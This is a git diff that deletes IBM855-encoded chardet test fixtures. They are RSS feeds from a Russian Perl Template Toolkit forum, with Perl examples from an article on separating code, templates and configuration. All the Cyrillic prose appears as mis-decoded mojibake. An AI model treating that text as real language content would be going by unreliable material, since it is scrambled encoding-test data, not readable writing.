½׀  /foo/bar.inc.html -[% SSI.include('virtual', '/foo/bar.inc.html') %] - -# כֶ׀¨װ·¨ × ½׀  /foo/bar.inc.html -[% SSI.include('file', '/var/www/html/foo/bar.inc.html') %] - -# כס״ײ׀װ·ום ֶײׂ װ¦ח -[% SSI.exec('cmd', 'ls') %] - -# כס״ײ׀װ·ום cgi דֶב·״ו -[% SSI.exec('cgi', '/cgi-bin/foo.cgi') %] - -# חדו װײכ·ום ״¨ב¨ׂ¨װװח ֶײװ×·¬חב ₪·· ('sizefmt', 'timefmt', ·׀· 'errmsg') -[% SSI.config('timefmt', &quot;%Y&quot;) %] - -# כסכ¨דו· װ ¢ײב ״¨ב¨ׂ¨װװח ײֶבחי¨װ· -[% SSI.echo('DATE_LOCAL') %] - -# חדו װײכ·ום ׀ײֶ ׀םװח ״¨ב¨ׂ¨װװח ($name = 'Corey') -[% SSI.set('name', 'Corey') %] - -# כסכ¨דו· ¦ וח ״ײד׀¨¦װ¨½ ׂײ¦·×·ֶ ₪·· 'index.html' -[% SSI.flastmod('file', 'index.html') %] - -# כסכ¨דו· ב ףׂ¨ב × ½׀  'index.html' -[% SSI.fsize('file', 'index.html') %]</pre></div> - - ׁײ¢ װײכ ¸¬ײבם <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-62.html - Template Toolkit - ¢·¢׀·ײו¨ֶ  ¦׀ ב ¢ײוס ד ץ ¢׀ײװ ׂ· כ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-62.html?rss - - - diff --git a/chardet/tests/IBM855/forum.template-toolkit.ru.8.xml b/chardet/tests/IBM855/forum.template-toolkit.ru.8.xml deleted file mode 100644 index 2e4d310..0000000 --- a/chardet/tests/IBM855/forum.template-toolkit.ru.8.xml +++ /dev/null @@ -1,228 +0,0 @@ - - - - - «ײבחׂס Template Toolkit : £·¢׀·ײו¨ֶ· ¦׀ ב ¢ײוס ד ץ ¢׀ײװ ׂ· כ Perl - http://forum.template-toolkit.ru/view_forum/forum_id-8.html?rss - Template Toolkit - ¢סדוב , ׂײשװ  · ב דץ·ב¨ׂ  ד·דו¨ׂ  ײ¢ב ¢ײוֶ· ץ ¢׀ײװײכ. ױ  ד ½ו¨ ב ¢ײו ¨ו ×ײבחׂ, כ ֶײוײבײׂ ײ¢דחי¦ וד כײ״בײדס ·ד״ײ׀םףײכ װ· ¢·¢׀·ײו¨ֶ· ״ײ ב ¢ײו¨ ד ץ ¢׀ײװ ׂ·. Text::Template, HTML::Template, Mason · ¦בח¬·¨ ¢·¢׀·ײו¨ֶ· - ru - Lobanov Igor - Lobanov Igor <webmaster@template-toolkit.ru> - Thu, 17 Mar 2005 12:03:32 GMT - Wed, 4 Jan 2006 02:29:01 GMT - Perl script, Template Toolkit - - http://forum.template-toolkit.ru/images/tt2powered.gif - Template Toolkit - ץ ¢׀ײװס כ perl - http://forum.template-toolkit.ru/ - 88 - 31 - - http://blogs.law.harvard.edu/tech/rss - - http://forum.template-toolkit.ru/view_topic/topic_id-53.html?rss - Tue, 28 Dec 2004 19:07:19 GMT - ג ף¦¨׀¨װ·¨ ֶײ¦ , ״ב¨¦דו כ׀¨װ·, · ֶײװ×·¬חב ₪·· - http://forum.template-toolkit.ru/view_topic/topic_id-53.html?rss - ױ  <a target="_blank" href="http://www.theperlreview.com/">Perl Review</a> ײ״ח¢׀·ֶײכ װ  דו ום £ב ½ װ  ¦¨ «ײ (brian d foy) &quot;Separating Code, Presentation, and Configuration&quot;. ױ·י¨ ״ב·כײ¦·וד ״¨ב¨כײ¦ דו ום·.<br /><br /><span style="font-weight:bold">ַב וֶ·½ ײ¢ףײב.</span><br /><br />א כף׀ ״בײ¬ב ׂׂח ·ף ״ב¨¦ס¦חש¨½ דו ום· · ב ף¦¨׀·׀ ֶײ¦, ״ב¨¦דו כ׀¨װ·¨ · ֶײװ×·¬חב ₪·, וײ¢ס ד¦¨׀ ום ״בײ¬ב ׂׂח ¢ײ׀¨¨ ¬·¢ֶײ½ · ׀¨¬ֶײ½ ¦׀ ״ײ¦¦¨ביֶ·.<br /><br /><span style="font-weight:bold">1. לכ¨¦¨װ·¨.</span><br /><br />ל ״ײד׀¨¦װ¨ׂ כס״חדֶ¨ ״ב¨¦דו כ·׀ ״בײ¬ב ׂׂח, ֶײוײבח ·ד״ײ׀םףח ¦׀ וײ¬ײ, וײ¢ס ף ¢·ב ום · ײוײ¢ב י ום Rich Site Summaries (RSS) ד ¦בח¬·µ כ¨¢-ד ½וײכ<span style="font-weight:bold"><sup>1</sup></span>. ל ֶײ¦¨ ·ד״ײ׀םףײכ ׀ ׀·ו¨ב ׀םװס¨ כ¨׀··װס, וײ¢ס חֶ ף ום ֶ ֶ·¨ × ½׀ס ף ¬בחי ום · ֶ ֶ ״ב¨¦דו כ׀ום ¦ װװס¨, · ײ¢¨ש ׀ וײ כ קוײׂ כס״חדֶ¨ קוײ ·ד״ב כ׀.<br /><br /><span style="font-style:italic">ׁ·דו·װ¬ 1</span> דײ¦¨בי·ו ״בײ¬ב ׂׂח, ֶײוײבח ״ב¨¦דו כ׀׀ כ ״ב¨¦ס¦חש¨ׂ כס״חדֶ¨. ל ׂ דד·כ¨ <span style="font-weight:bold">@files</span> µב װוד × ½׀ס, ֶײוײבס¨ װ¨ײ¢µײ¦·ׂײ ף ¬בחף·ום, <span style="font-weight:bold">$base</span> - ֶ ו ׀ײ¬, ¬¦¨ דײµב װ¨וד כסכײ¦, · װ¨דֶײ׀םֶײ כסב י¨װ·½ <span style="font-weight:bold">print</span> דײף¦ ו HTML ד ״ײ¦דו װײכֶײ½ ״בײדוסµ ״¨ב¨ׂ¨װװסµ (וײ ״ב¨¦״ײו·ו¨׀םװ¨¨ דֶ י¨ׂ ¨ׂ ·ד״ײ׀םףײכ ום HTML-×חװֶ₪·· ׂײ¦ח׀ CGI). רוײ װ¨¬·¢ֶ·½ · ובח¦װס½ ¦׀ דײ״בײכײי¦¨װ· ֶײ¦. ַײ¬¦  ף µײח ״ײׂ¨װום ד״·דײֶ ד ½וײכ ·׀· כסכײ¦, ב·דֶח ד׀ײׂ ום ״בײ¬ב ׂׂח, ¨ד׀· װ ¢¨בח וײ-וײ װ¨״ב כ·׀םװײ ·׀· ד¦¨׀  ¦בח¬ח ײץ·¢ֶח.<br /><br /><span style="font-style:italic">ׁ·דו·װ¬ 1: פ ¬בחף·ֶ RSS ד י¨דוֶײ״בײ״·ד װװסׂ· ףװ ¨װ·ׂ·.</span><br /><div class="code"><pre>1 #!/usr/bin/perl -w -2 use strict; -3 -4 use LWP::Simple; -5 use XML::RSS; -6 -7 my @files = qw( -8 http://use.perl.org/useperl.rss -9 http://search.cpan.org/rss/search.rss -10 http://jobs.perl.org/rss/standard.rss -11 http://www.perl.com/pace/perlnews.rdf -12 http://www.perlfoundation.org/perl-foundation.rdf -13 http://www.stonehenge.com/merlyn/UnixReview/ur.rss -14 http://www.stonehenge.com/merlyn/WebTechniques/wt.rss -15 http://www.stonehenge.com/merlyn/LinuxMag/lm.rss -16 ); -17 -18 my $base = '/usr/home/comdog/TPR/rss-html'; -19 -20 foreach my $url ( @files ) -21 { -22 my $file = $url; -23 -24 $file =~ s|.*/||; -25 -26 my $result = open my $fh, &quot;&gt; $base/$file.html&quot;; -27 -28 unless( $result ) -29 { -30 warn &quot;Could not open [$file] for writing! $!&quot;; -31 next; -32 } -33 -34 select $fh; -35 -36 my $rss = XML::RSS-&gt;new(); -37 my $data = get( $url ); -38 $rss-&gt;parse( $data ); -39 -40 my $channel = $rss-&gt;{channel}; -41 my $image = $rss-&gt;{image}; -42 -43 print &lt;&lt;&quot;HTML&quot;; -44 &lt;table cellpadding=1&gt;&lt;tr&gt;&lt;td bgcolor=&quot;#000000&quot;&gt; -45 &lt;table cellpadding=5&gt; -46 &lt;tr&gt;&lt;td bgcolor=&quot;#aaaaaa&quot; align=&quot;center&quot;&gt; -47 HTML -48 -49 if( $image-&gt;{url} ) -50 { -51 my $img = qq|&lt;img src=&quot;$$image{url}&quot; alt=&quot;$$channel{title}&quot;&gt;|; -52 print qq|&lt;a href=&quot;$$channel{link}&quot;&gt;$img&lt;/a&gt;&lt;br&gt;\n|; -53 } -54 else -55 { -56 print qq|&lt;a href=&quot;$$channel{link}&quot;&gt;$$channel{title}&lt;/a&gt;&lt;br&gt;\n|; -57 } -58 -59 print &lt;&lt;&quot;HTML&quot;; -60 &lt;font size=&quot;-1&quot;&gt;$$channel{description}&lt;/font&gt; -61 &lt;/td&gt;&lt;/tr&gt; -62 &lt;tr&gt;&lt;td bgcolor=&quot;#bbbbff&quot; width=200&gt;&lt;font size=&quot;-1&quot;&gt; -63 HTML -64 -65 foreach my $item ( @{ $rss-&gt;{items} } ) -66 { -67 print qq|&lt;b&gt;&gt;&lt;/b&gt;&lt;a href=&quot;$$item{link}&quot;&gt;$$item{title}&lt;/a&gt;&lt;br&gt;&lt;br&gt;\n|; -68 } -69 -70 print &lt;&lt;&quot;HTML&quot;; -71 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt; -72 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; -73 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; -74 HTML -75 -76 close $fh; -77 }</pre></div><br /><br /><span style="font-weight:bold">2. ׳ו¦¨׀¨װ·¨ ״ב¨¦דו כ׀¨װ·.</span><br /><br />¶ײבײץ·½ ¦·ף ½װ װ¨ דכףסכ ¨ו ד¨¢ ד  דוװסׂ ״ב¨¦דו כ׀¨װ·¨ׂ ¦ װװסµ. ׃ײ ״בײ¬ב ׂׂ  ¦ײ׀יװ  ף ¢ב ום ¦ װװס¨ · ד¦¨׀ ום ·µ ¦ײדוח״װסׂ· ¨ׂח-וײ, וײ ·µ ״ב¨¦דו כ׀¨ו - וײ, וײ ב ¢ײו  ד RSS װ¨ ¦ײ׀יװײ ·ׂ¨ום ףװ ¨װ·. א ׂײ¬ח ף µײו¨ום ״בײ·ףכײ¦·ום HTML, TeX, ״בײדוײ½ ו¨ֶדו, ·׀· ¦ י¨ ֶ ֶײ½-וײ ×ײבׂ ו, ֶײוײבס½ װ¨ ׂײ¬ח ד¨¢¨ ״ב¨¦דו כ·ום.<br /><br />לײףׂײיװײ ֶוײ-וײ ף µײ¨ו װ ״·ד ום דײ¢דוכ¨װװח ד·דו¨ׂח ¦׀ ב ¢ײוס ד ץ ¢׀ײװ ׂ·, װײ ׂװ¨ װב כ·וד ׂײ¦ח׀ם Text::Template ׃ בֶ -§י¨½דײװ  §ײׂ·װחד  (Mark-Jason Dominus). ׳װ ¦¨׀ ¨ו כד¨ וײ ׂװ¨ װ¨ײ¢µײ¦·ׂײ, װ¨ וב¨¢ח¨ו ¦׀ דכײ¨½ ב ¢ײוס ¦ײ״ײ׀װ·ו¨׀םװסµ ״בײ¬ב ׂׂ · װ ״·ד װ ״ײ׀װײדום װ  Perl. ט װ¨¬ײ ״בײדוײ½ ·װו¨בר½ד · ׂװ¨ װ¨ וב¨¢ח¨וד ·ףח ום ףסֶ ץ ¢׀ײװײכ, ״ײדֶײ׀םֶח ץ ¢׀ײװס ·ד״ײ׀םףחו Perl.<br /><br /><span style="font-style:italic">ׁ·דו·װ¬ 2</span> - קוײ ו  י¨ ״בײ¬ב ׂׂ , וײ׀םֶײ כׂ¨דוײ כװ¨¦ב¨װװײ¬ײ HTML ·ד״ײ׀םףח¨וד Text::Template. ל דובײֶ¨ 5 ·ׂ״ײבו·בח ׂ¨וײ¦ fill_in_file(). ל דובײֶ¨ 13 חֶ ףסכ  ץ ¢׀ײװ, ֶײוײבס½ ¢ח¦ח ·ד״ײ׀םףײכ ום. ל¨דם HTML, ·ד״ײ׀םףח¨ׂס½ ״בײ¬ב ׂׂײ½, ו¨״¨בם כסװ¨ד¨װ כ × ½׀ ץ ¢׀ײװ , ״ב·כ¨¦¨װװס½ כ <span style="font-style:italic">׀·דו·װ¬¨ 3</span>.<br /><br />׃ײ¦ח׀ם Text::Template ׂײי¨ו ״ב·װ·ׂ ום ¦ װװס¨ ֶ ֶ µ¨ץ. ַ׀· µ¨ץ  דו װײכוד ·ׂ¨װ ׂ· ״¨ב¨ׂ¨װװסµ כ ץ ¢׀ײװ¨,   ףװ ¨װ· - ףװ ¨װ·ׂ· ״¨ב¨ׂ¨װװסµ ץ ¢׀ײװ ,   ו ֶי¨ ײ״ב¨¦¨׀ו ו·״ ״¨ב¨ׂ¨װװסµ. ©ד׀· ףװ ¨װ·¨ µ¨ץ  ״בײדוײ½ דֶ ׀ב, ״¨ב¨ׂ¨װװ  ץ ¢׀ײװ  דֶ ׀ב. ©ד׀· ףװ ¨װ·¨ µ¨ץ  -  װײװ·ׂװס½ ׂ דד·כ, ״¨ב¨ׂ¨װװ  ץ ¢׀ײװ  - ׂ דד·כ, · ו ֶ ¦ ׀¨¨.<br /><br />׳¢¨ֶו, דײף¦ כ ¨ׂס½ XML::RSS -  װײװ·ׂװס½ µ¨ץ. ׃ײ¦ח׀ם ״ב¨¦ײדו כ׀¨ו  ¢דוב ֶוװס½ ·װו¨בר½ד ¦׀ דײף¦ װ·, װײ װ¨ ¦׀ ¦ײדוח״ . רוײ ײו דו· ·ׂ¨װװײ וײ, וײ ¦ײ׀י¨װ ״¨ב¨¦ ום ׂײ¨ׂח ץ ¢׀ײװח. ל ץ ¢׀ײװ¨ <span style="font-weight:bold">$rss-&gt;channel</span>, ֶײוײב  כ ֶ ¨דוכ¨ ףװ ¨װ· דײ¦¨בי·ו  װײװ·ׂװס½ µ¨ץ, דו װײכ·וד <span style="font-weight:bold">%channel</span>,   <span style="font-weight:bold">$rss-&gt;items</span>, דײ¦¨בי ש   װײװ·ׂװס½ ׂ דד·כ דו װײכ·וד <span style="font-weight:bold">@items</span>.<br /><br /><span style="font-style:italic">ׁ·דו·װ¬ 2: ¸ד״ײ׀םףײכ װ·¨ ץ ¢׀ײװ .</span><br /><div class="code"><pre>1 #!/usr/bin/perl -w -2 use strict; -3 -4 use LWP::Simple; -5 use Text::Template qw(fill_in_file); -6 use XML::RSS; -7 -8 my @files = qw( -9 http://use.perl.org/useperl.rss -10 ); -11 -12 my $base = '.'; -13 my $template = 'rss-html.tmpl'; -14 -15 foreach my $url ( @files ) -16 { -17 my $file = $url; -18 -19 $file =~ s|.*/||; -20 -21 my $result = open my $fh, &quot;&gt; $base/$file.html&quot;; -22 -23 unless( $result ) -24 { -25 warn &quot;Could not open [$file] for writing! $!&quot;; -26 next; -27 } -28 -29 my $rss = XML::RSS-&gt;new(); -30 my $data = get( $url ); -31 $rss-&gt;parse( $data ); -32 -33 print fill_in_file( $template, HASH =&gt; $rss ); -34 close $fh; -35 }</pre></div><br /><br />לװחוב· ץ ¢׀ײװ  Text::Template ·ד״ײ׀װ¨ו ¢׀ײֶ· ֶײ¦ , ֶײוײבס¨ ײװ װ µײ¦·ו ׂ¨י¦ח ×·¬חבװסׂ· דֶײ¢ֶ ׂ·. ׳װ ף ׂ¨װ¨ו ¢׀ײֶ ״ײד׀¨¦װ·ׂ כס·ד׀¨װװסׂ כסב י¨װ·¨ׂ. ¸ׂ¨װ  ״¨ב¨ׂ¨װװסµ - ֶ׀· µ¨ץ , דדס׀ֶח װ  ֶײוײבס½ ״¨ב¨¦ ׀ כ ֶ ¨דוכ¨  ב¬חׂ¨װו  ×חװֶ₪·· fill_in_file() כ ֶײ¦¨, ״ב·כ¨¦¨װװײׂ כ <span style="font-style:italic">׀·דו·װ¬¨ 2</span>.<br /><br /><span style="font-style:italic">ׁ·דו·װ¬ 3: HTML ץ ¢׀ײװ.</span><br /><div class="code"><pre>1 &lt;table cellpadding=1&gt;&lt;tr&gt;&lt;td bgcolor=&quot;#000000&quot;&gt; -2 &lt;table cellpadding=5&gt; -3 &lt;tr&gt; -4 &lt;td bgcolor=&quot;#aaaaaa&quot; align=&quot;center&quot;&gt; -5 &lt;a href=&quot;{ $channel{link} }&quot;&gt;{ -6 -7 $image ? qq|&lt;img src=&quot;$image&quot; alt=&quot;$channel{title}&quot;&gt;| : $channel{title} -8 -9 }&lt;/a&gt;&lt;br&gt; -10 -11 { $channel{description} } -12 &lt;/td&gt; -13 &lt;/tr&gt; -14 -15 &lt;tr&gt; -16 &lt;td bgcolor=&quot;#bbbbff&quot; width=200&gt;&lt;font size=&quot;-1&quot;&gt; -17 { -18 my $str; -19 -20 foreach my $item ( @items ) -21 { -22 $str .= qq|&lt;b&gt;&gt;&lt;/b&gt;&lt;a href=&quot;$$item{link}&quot;&gt;$$item{title}&lt;/a&gt;&lt;br&gt;&lt;br&gt;\n|; -23 } -24 -25 $str; -26 }&lt;/font&gt;&lt;/td&gt; -27 &lt;/tr&gt; -28 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; -29 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;</pre></div><br /><br />ַ ֶ וײ׀םֶײ ד·דו¨ׂ  ץ ¢׀ײװײכ ף ¦¨½דוײכ װ , ׂײ¬ח ׂ¨װום ״ב¨¦דו כ׀¨װ·¨ װ¨ ׂ¨װ ׀ײ¬·ֶח ֶײ¦ . ©ד׀· ״ב·ׂח ב¨ץ¨װ·¨ ·ףׂ¨װ·ום כ·¦ ״ב¨¦דו כ׀¨װ· ¦ װװסµ, ״ײׂ¨װ וײ׀םֶײ ץ ¢׀ײװ. ©ד׀· ׂװ¨ כׂ¨דוײ HTML וב¨¢ח¨וד ״בײדוײ½ ו¨ֶדו, וײ׀םֶײ ·ףׂ¨װ ״ײ¦ װײכס½ ×ײבׂ ו ץ ¢׀ײװ, ֶ ֶ קוײ ד¦¨׀ װײ כ <span style="font-style:italic">׀·דו·װ¬¨ 4</span>.<br /><br /><span style="font-style:italic">ׁ·דו·װ¬ 4: צ ¢׀ײװ ¦׀ ײ¢סװײ¬ײ ו¨ֶדו .</span><br /><div class="code"><pre>1 { $channel{title} } -2 -3 { $channel{description} } -4 -5 { -6 my $str; -7 -8 foreach my $item ( @items ) -9 { -10 $str .= qq|* $$item{title}\n|; -11 } -12 -13 $str; -14 }</pre></div><br /><br /><span style="font-weight:bold">3. ׳ו¦¨׀¨װ·¨ ֶײװ×·¬חב ₪··.</span><br /><br />¶ײבײץ·½ ¦·ף ½װ ו ֶי¨ ״ײףכײ׀¨ו  ¦ ״ו·בײכ ום דֶב·״ו ֶ ב ף׀·װײׂח ײֶבחי¨װ·. ל <span style="font-style:italic">׀·דו·װ¬¨ 1</span> י¨דוֶײ ״בײ״·ד ׀ ףװ ¨װ·¨ ¦·ב¨ֶוײב·· ¦׀ כסכײ¦ , וײ ¦¨׀ ¨ו ׂײ½ דֶב·״ו µבח״ֶ·ׂ - ¨ד׀· ׂײ ¦ײׂ ץװ ¦·ב¨ֶוײב· ״ײׂ¨װ¨וד, דֶב·״ו ד׀ײׂ ¨וד. ַבײׂ¨ וײ¬ײ <span style="font-style:italic">כ ׀·דו·װ¬¨ 2</span> י¨דוֶײ ״בײ״·ד װײ ·ׂ ץ ¢׀ײװ , װ¨דׂײוב װ  וײ וײ ׂײ¬ח ׂ¨װום ״ב¨¦דו כ׀¨װ·¨, ·ףׂ¨װ ץ ¢׀ײװ. ׃װ¨ װחיװײ ·ׂ¨ום כײףׂײיװײדום ¦ כ ום ֶ י¦ײׂח ץ ¢׀ײװח דײ¦¨בי ו¨׀םװײ¨ ·ׂ כׂ¨דוײ ·ד״ײ׀םףײכ װ· ײ¦װײ¬ײ · וײ¬ײ י¨ ·ׂ¨װ· ¦׀ ב ףװײ¬ײ דײ¦¨בי·ׂײ¬ײ.<br /><br />׃װײ¬·¨ דכײ¢ײ¦װײ-¦ײדוח״װס¨ דֶב·״וס, ֶײוײבס¨ װ ץ¨׀ כ ¸װו¨בװ¨ו וב¨¢חו, וײ¢ס ״ײ׀םףײכ ו¨׀ם ײוב¨¦ ֶו·בײכ ׀ כ¨בµװ  דום דֶב·״ו  ·׀· כֶ׀ ¨ׂח ¢·¢׀·ײו¨ֶח, ֶײוײב  דײ¦¨בי·ו וײ׀םֶײ ֶײװ×·¬חב ₪·ײװװס¨ ¦ װװס¨. ז ֶײ½ ״ײ¦µײ¦ וב¨¢ח¨ו, וײ¢ס ֶײװ¨װס½ ״ײ׀םףײכ ו¨׀ם ףװ ׀ ײדװײכס ףסֶ  ״בײ¬ב ׂׂ·בײכ װ· · ״ב כ·׀ דֶב·״ו - ײץ·¢ֶ  ד׀ײׂ ¨ו דֶב·״ו. ׀ײµ·¨ ֶײװ×·¬חב ₪·ײװװס¨ ¦ װװס¨ ׂײ¬חו ״ב·כ¨דו· ֶ װ¨ײי·¦ װװסׂ ב¨ףח׀םו ו ׂ, װײ ײװ· װ¨ ״ײ׀ײׂ ו ״בײ¬ב ׂׂח.<br /><br />א ׂײ¬ח חֶ ף ום ו¨ֶחש·¨ ֶײװ×·¬חב ₪·ײװװס¨ ¦ װװס¨ װ¨דֶײ׀םֶ·ׂ· ד״ײדײ¢ ׂ· · ״ײֶ יח וײ׀םֶײ ײ¦·װ ·ף װ·µ. ¡בµ·כ Comprehensive Perl Archive Network (CPAN)<span style="font-weight:bold"><sup>2</sup></span> דײ¦¨בי·ו װ¨דֶײ׀םֶײ ׂײ¦ח׀¨½ ¦׀ ב ף¢ײב  ֶײװ×·¬חב ₪·ײװװסµ × ½׀ײכ כ ב ף׀·װסµ ×ײבׂ ו µ ·׀·  ב¬חׂ¨װוײכ ֶײׂ װ¦װײ½ דובײֶ·. §·ף ½װ¨בס ¦ײ׀יװס כס¢·ב ום ״ײ¦µײ¦, ֶײוײבס½ ח¦ײכ׀¨וכײב¨ו ·µ װחי¦ ׂ.<br /><br />ַײ¬¦  כ״¨בכס¨ װ  ׀ ײו¦¨׀ום ¦ װװס¨ ֶײװ×·¬חב ₪·· ײו ׂײ·µ דֶב·״וײכ, ״¨ב¨¢ב ׀ װ¨דֶײ׀םֶײ ׂײ¦ח׀¨½ װ  CPAN · ײדו װײכ·׀ד װ  ConfigReader::Simple, ֶײוײבס½ ·ד״ײ׀םףח¨ו ״ײדובײװס½ ×ײבׂ ו ֶ׀-ףװ ¨װ·¨. א ·ד״ײ׀םףײכ ׀ ¨¬ײ װ דוײ׀םֶײ  דוײ, וײ װ  ׀ ײו״ב כ׀ום ׂײ· ·ףׂ¨װ¨װ· £¨ֶח ׳¢¨ב·װח (Bek Oberin),  כוײבח ײב·¬·װ ׀םװײ½ כ¨בד··, ף ו¨ׂ ״ײ׀װײדום כף׀ װ  ד¨¢ ״ײ¦¦¨ביֶח ׂײ¦ח׀.<br /><br /><span style="font-style:italic">ׁ·דו·װ¬ 5</span>  ¦ ״ו·בח¨ו <span style="font-style:italic">׀·דו·װ¬ 2</span> ֶ ·ד״ײ׀םףײכ װ· ConfigReader::Simple. א דײף¦  װײכס½ ײ¢¨ֶו ֶײװ×·¬חב ₪··, ף ו¨ׂ ·ו  ףװ ¨װ· ·ף ײ¢¨ֶו . ׃ײ¦ח׀ם ״ב¨ײ¢ב ףח¨ו ·ׂ¨װ  ֶ׀¨½ ֶײװ×·¬חב ₪·· כ ·ׂ¨װ  ׂ¨וײ¦ײכ ¦׀ ״בײדוײ¬ײ ¦ײדוח״  (µײו ¦׀ ¦ײדוח״  ֶ ףװ ¨װ·ׂ ֶ׀¨½ ד קֶףײו·¨דֶ·ׂ· ·ׂ¨װ ׂ·, ֶײוײבס¨ װ¨ ׂײ¬חו ¢סום ״ב¨ײ¢ב ףײכ װס כ ·¦¨װו·×·ֶ וײבס Perl ״ב·µײ¦·וד ·ד״ײ׀םףײכ ום ׂ¨וײ¦ get()). <span style="font-style:italic">ׁ·דו·װ¬ 6</span> דײ¦¨בי·ו ֶײװ×·¬חב ₪·ײװװס½ × ½׀.<br /><br /><span style="font-style:italic">ׁ·דו·װ¬ 5: ¸ד״ײ׀םףײכ װ·¨ ConfigReader::Simple.</span><br /><div class="code"><pre>1 #!/usr/bin/perl -w -2 use strict; -3 -4 use ConfigReader::Simple; -5 use LWP::Simple; -6 use Text::Template qw(fill_in_file); -7 use XML::RSS; -8 -9 my $config = ConfigReader::Simple-&gt;new( './rss.config' ); -10 -11 my $base = $config-&gt;base; -12 my $template = $config-&gt;template; -13 my $extension = $config-&gt;extension; -14 -15 my @files = split /\s+/, $config-&gt;files; -16 -17 foreach my $url ( @files ) -18 { -19 my $file = $url; -20 -21 $file =~ s|.*/||; -22 -23 my $result = open my $fh, &quot;&gt; $base/$file.$extension&quot;; -24 -25 unless( $result ) -26 { -27 warn &quot;Could not open [$file] for writing! $!&quot;; -28 next; -29 } -30 -31 my $rss = XML::RSS-&gt;new(); -32 my $data = get( $url ); -33 $rss-&gt;parse( $data ); -34 -35 print $fh fill_in_file( $template, HASH =&gt; $rss ); -36 close $fh; -37 }</pre></div><br /><span style="font-style:italic">ׁ·דו·װ¬ 6: « ½׀ ֶײװ×·¬חב ₪··.</span><br /><div class="code"><pre>1 base . -2 template rss-html.tmpl -3 files http://use.perl.org/useperl.rss -4 extension html</pre></div><br /><br /><span style="font-weight:bold">4. פ ֶ׀¨װ·¨.</span><br /><br />א ׂײ¬ח חׂ¨װםץ·ום ב ףׂ¨ב ׂײ·µ ״בײ¬ב ׂׂ, ײו¦¨׀ ֶײ¦ ײו ׀ײ¬·ֶ· ״ב¨¦דו כ׀¨װ· · ֶײװ×·¬חב ₪·ײװװײ½ ·װ×ײבׂ ₪··. רוײ ב ף¦¨׀¨װ·¨ ¦¨׀ ¨ו ״בײ¬ב ׂׂח ¢ײ׀¨¨ ¬·¢ֶײ½ · ״בײדוײ½ כ  ¦ ״ו ₪·· ֶ װײכסׂ ײֶבחי¨װ·ׂ. צ ¢׀ײװס ״ײףכײ׀ו ·ףׂ¨װום כסכײ¦,   ֶײװ×·¬חב ₪·ײװװס¨ × ½׀ס ח״ב כ׀ום ב ¢ײוײ½ ״בײ¬ב ׂׂס ¢¨ף ·ףׂ¨װ¨װ· ֶײ¦ . Text::Template · ConfigReader::Simple ¦¨׀ ו קוײ װ דוײ׀םֶײ ״בײדוסׂ, װ דֶײ׀םֶײ כײףׂײיװײ.<br /><br /><span style="font-weight:bold">5. הדס׀ֶ·</span><br /><br />לד¨ ׂײ¦ח׀·, ח״ײׂ·װ ¨ׂס¨ כ קוײ½ דו ום¨, ׂײיװײ װ ½ו· װ  Comprehensive Perl Archive Network (CPAN) - <a target="_blank" href="http://search.cpan.org">http://search.cpan.org</a><br /><br /><span style="font-weight:bold">6. ׳¢  כוײב¨.</span><br /><br />£ב ½ װ ¦¨ «ײ½ (brian d foy) - ·ף¦ ו¨׀ם <span style="font-style:italic">The Perl Review</span>.<br /><br /><span style="font-weight:bold">ב·ׂ¨ װ·.</span><br /><br /><span style="font-weight:bold"><sup>1</sup></span> &quot;Simple RSS with Perl&quot; by brian d foy, The Perl Review v0 i5, November 2002, <a target="_blank" href="http://www.theperlreview.com">http://www.ThePerlReview.com</a><br /><br /><span style="font-weight:bold"><sup>2</sup></span> <a target="_blank" href="http://search.cpan.org">http://search.cpan.org</a><br /><br /><a target="_blank" href="http://www.theperlreview.com/Articles/v0i7/config.pdf">ײב·¬·װ ׀ דו ום· װ  Perl Review (PDF)</a> - - ׁײ¢ װײכ ¸¬ײבם <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-53.html - §בח¬·¨ ו¨ׂס, דכף װװס¨ ד ץ ¢׀ײװ ׂ· · Perl - http://forum.template-toolkit.ru/view_topic/topic_id-53.html?rss - - - diff --git a/chardet/tests/IBM855/forum.template-toolkit.ru.9.xml b/chardet/tests/IBM855/forum.template-toolkit.ru.9.xml deleted file mode 100644 index 9cf93f0..0000000 --- a/chardet/tests/IBM855/forum.template-toolkit.ru.9.xml +++ /dev/null @@ -1,55 +0,0 @@ - - - - - «ײבחׂס Template Toolkit : אףסֶ ״בײ¬ב ׂׂ·בײכ װ· Perl - http://forum.template-toolkit.ru/view_forum/forum_id-9.html?rss - Template Toolkit - ¢סדוב , ׂײשװ  · ב דץ·ב¨ׂ  ד·דו¨ׂ  ײ¢ב ¢ײוֶ· ץ ¢׀ײװײכ. ױ  ד ½ו¨ ב ¢ײו ¨ו ×ײבחׂ, כ ֶײוײבײׂ ײ¢דחי¦ וד כײ״בײדס ·ד״ײ׀םףײכ װ· ¢·¢׀·ײו¨ֶ· ״ײ ב ¢ײו¨ ד ץ ¢׀ײװ ׂ·. ז¨ׂס, דכף װװס¨ ד ״בײ¬ב ׂׂ·בײכ װ·¨ׂ כ Perl - ru - Lobanov Igor - Lobanov Igor <webmaster@template-toolkit.ru> - Sun, 4 Dec 2005 16:14:30 GMT - Wed, 4 Jan 2006 02:29:01 GMT - Perl script, Template Toolkit - - http://forum.template-toolkit.ru/images/tt2powered.gif - Template Toolkit - ץ ¢׀ײװס כ perl - http://forum.template-toolkit.ru/ - 88 - 31 - - http://blogs.law.harvard.edu/tech/rss - - http://forum.template-toolkit.ru/view_topic/topic_id-119.html?rss - Sun, 4 Dec 2005 16:09:31 GMT - £¨ד״׀ וװס½ Perl-ב¨¦ ֶוײב - http://forum.template-toolkit.ru/view_topic/topic_id-119.html?rss - £¨ד״׀ וװס½ Perl-ב¨¦ ֶוײב ¦׀ Windows ד ׂװײי¨דוכ¨װװסׂ· ·װדובחׂ¨װו ׂ· ײו׀ ¦ֶ· דֶב·״וײכ.<br /> -<br /> -URL ף ¬בחףֶ·: <br /> -http://www.perl-express.com/PeSetRussv245.exe<br /> -§ײׂ ץװ דוב װ·₪ : <br /> -http://www.perl-express.com/ru/ - - mixail <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-119.html - §בח¬·¨ ו¨ׂס, דכף װװס¨ ד ץ ¢׀ײװ ׂ· · Perl - 